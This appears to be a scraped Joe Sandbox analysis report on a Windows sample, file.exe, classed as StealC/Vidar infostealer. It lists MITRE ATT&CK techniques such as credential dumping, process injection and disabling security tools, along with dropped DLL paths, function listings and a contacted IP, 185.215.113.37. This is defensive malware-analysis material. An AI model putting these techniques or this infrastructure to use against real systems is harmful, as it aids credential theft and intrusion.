Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEHIDAKECFIEBGDHJEBK

C:\ProgramData\AFHDAKJKFCFBGCBGDHCBAFCAKE

C:\ProgramData\AKFHCAKJ

C:\ProgramData\BFCFBFBFBKFIDHJKFCAF

C:\ProgramData\FIJECAEH

C:\ProgramData\GHJDHDAECBGCAKEBAEBAAKKKFH

C:\ProgramData\HJJJECFIECBGDGCAAAEH

C:\ProgramData\JDHJKKFBAEGDGDGCBKECBGCGCF

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 00989860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 009745C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0097BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C5C35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00984910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00974880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00989C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00977710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00980250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre